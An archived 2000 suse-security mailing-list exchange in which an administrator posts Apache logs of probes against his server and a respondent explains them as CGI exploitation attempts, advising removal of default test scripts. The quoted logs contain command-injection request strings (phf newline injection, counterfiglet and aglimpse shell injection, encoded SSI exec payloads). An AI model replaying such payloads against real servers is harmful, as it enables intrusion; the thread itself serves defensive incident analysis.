NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > SuSE Linux> 2000-q2

Subject: AW: [suse-security] Web server security holes ?
From: Harald Scharf (h.scharfsoftpoint.at)
Date: Wed Apr 05 2000 - 03:04:09 CDT

Next message: Francisco M. Marzoa Alonso: "Re: [suse-security] Web server security holes ?"
Previous message: Francisco M. Marzoa Alonso: "Re: [suse-security] Web server security holes ?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Sombody tried to use web server cgi scripts to hack your server.
the line POST /cgi-bin/phf?Qname=x%oa means :

call the script phf in cgi-bin
%0a = carrige return
/bin/sh tried to call an external program

!! DELETE ALL YOUR TEST-CGIs and PHPs delivered with the WEB Server in
Standard configuration !!

Best way to secure (but maybe not possible) : Do not allow POST on CGI

bye

Harald Scharf
softpoint electronic
h.scharfsoftpoint.at

-----Ursprüngliche Nachricht-----
Von: Marc Baaden [mailto:marccausul.u-strasbg.fr]
Gesendet: Mittwoch, 5. April 2000 09:34
An: suse-securitysuse.com
Betreff: [suse-security] Web server security holes ?

Dear All,

I am quite concerned about security, and I think my machine is doing
well
with respect to all usual services as telnet, FTP, etc...

Unfortunately I am not very experienced with web servers, and have the
standard
features of SuSE 6.3 installed (Apache, I think).
On two of my machines I got the following log entries in http.acces_log/
error_log

- What does it mean ?
- Is it dangerous for the machine ?
- Can I further secure my machine ?
PS: I do NOT need the machine beeing accessible by external machines in
HTTP

Thank you for explaining these things to me ...

131.155.14.130 - - [19/Mar/2000:07:09:12 +0100] "POST /cgi-bin/perl
HTTP/1.0" 404 281
131.155.14.130 - - [19/Mar/2000:07:09:12 +0100] "POST
/cgi-bin/phf?Qname=x%0a/bin/sh+-s%0a HTTP/1.0" 404 280
128.175.13.74 - - [19/Mar/2000:17:43:12 +0100] "GET
/cgi-bin/counterfiglet/nc/f=;echo;echo%20{_begin-counterfiglet_};uname%2
0-a;id;w;echo%20{_end-counterfiglet_};echo HTTP/1.0" 404 376
128.175.13.74 - - [20/Mar/2000:03:46:42 +0100] "POST /cgi-bin/test-cgi
HTTP/1.0" 200 482
128.175.13.74 - - [20/Mar/2000:06:07:22 +0100] "POST
/cgi-bin/phf?Qname=x%0a/bin/sh+-s%0a HTTP/1.0" 404 280
128.175.13.74 - - [20/Mar/2000:07:02:50 +0100] "GET
/cgi-bin/aglimpse/80|IFS=_;CMD=_echo\;echo_id-aglimpse\;uname_-a\;id;eva
l$CMD; HTTP/1.0" 404 346
128.175.13.74 - - [21/Mar/2000:00:50:01 +0100] "POST /cgi-bin/perl
HTTP/1.0" 404 281
128.175.13.74 - - [21/Mar/2000:06:33:15 +0100] "POST /cgi-bin/sh
HTTP/1.0" 404 279
128.175.13.74 - - [21/Mar/2000:07:17:24 +0100] "GET
/cgi-bin/query?x=%3C%21%2D%2D%23%65%78%65%63%20%63%6D%64%3D%22%2F%75%73%
72%2F%62%69%6E%2F%69%64%22%2D%2D%3E HTTP/1.0" 404 282
128.175.13.74 - - [21/Mar/2000:08:32:59 +0100] "GET
/%3C%21%2D%2D%23%65%78%65%63%20%63%6D%64%3D%22%2F%75%73%72%2F%62%69%6E%2
F%69%64%22%2D%2D%3E/index.html HTTP/1.0" 404 316

[Sun Mar 19 17:43:12 2000] [error] [client 128.175.13.74] script not
found or unable to stat: /usr/local/httpd/cgi-bin/counterfiglet
[Mon Mar 20 06:07:22 2000] [error] [client 128.175.13.74] script not
found or unable to stat: /usr/local/httpd/cgi-bin/phf
[Mon Mar 20 07:02:50 2000] [error] [client 128.175.13.74] script not
found or unable to stat: /usr/local/httpd/cgi-bin/aglimpse
[Tue Mar 21 00:50:01 2000] [error] [client 128.175.13.74] script not
found or unable to stat: /usr/local/httpd/cgi-bin/perl
[Tue Mar 21 06:33:15 2000] [error] [client 128.175.13.74] script not
found or unable to stat: /usr/local/httpd/cgi-bin/sh
[Tue Mar 21 07:17:24 2000] [error] [client 128.175.13.74] script not
found or unable to stat: /usr/local/httpd/cgi-bin/query

[Thu Mar 30 22:34:16 2000] [notice] Apache/1.3.9 (Unix) (SuSE/Linux)
mod_perl/1.21 PHP/3.0.12 configured -- resuming normal operations
[Thu Mar 30 22:34:16 2000] [notice] suEXEC mechanism enabled (wrapper:
/usr/sbin/suexec)
[

Marc Baaden

-- Marc Baaden - Labo MSM (UMR 7551) - http://crypt.u-strasbg.fr/marc mailto:baaden

chimie.u-strasbg.fr - FAX (+49) 89 24 43 1 68 68 ICQ# 11466242 - Tel: (+33) 3 88 41 60 86 or (+33) 6 09 84 32 17

--------------------------------------------------------------------- To unsubscribe, e-mail: suse-security-unsubscribesuse.com For additional commands, e-mail: suse-security-helpsuse.com

Next message: Francisco M. Marzoa Alonso: "Re: [suse-security] Web server security holes ?"
Previous message: Francisco M. Marzoa Alonso: "Re: [suse-security] Web server security holes ?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]